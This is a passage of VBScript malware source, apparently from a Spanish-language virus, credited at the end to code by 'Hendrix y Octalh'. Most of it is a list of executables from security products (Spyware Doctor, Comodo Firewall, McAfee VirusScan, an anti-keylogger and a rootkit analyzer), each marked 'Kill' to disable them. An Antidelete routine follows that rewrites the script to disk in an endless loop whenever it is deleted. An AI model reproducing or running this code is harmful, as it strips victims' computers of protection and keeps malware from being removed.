"C:\Archivos de programa\Spyware Doctor\swcntaux.exe" Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe" Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe" Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin" Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe" Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe" Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe" Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe" Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe" Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe" Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe" Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe" Kill "C:\Archivos de programa\ATS2\ats.exe" Kill "C:\Archivos de programa\ATS2\d1.exe" Kill "C:\Archivos de programa\ATS2\sysinfo.exe" Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe" Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe" Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE" End Sub Function Antidelete() On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set Myself = fso.opentextfile(wscript.scriptfullname, 1) MyCode = Myself.readall Myself.Close Do If Not (fso.fileexists(wscript.scriptfullname)) Then Set Myself = fso.createtextfile(wscript.scriptfullname, True) Myself.write MyCode Myself.Close End If Loop End Function
Basado en código de Hendrix y Octalh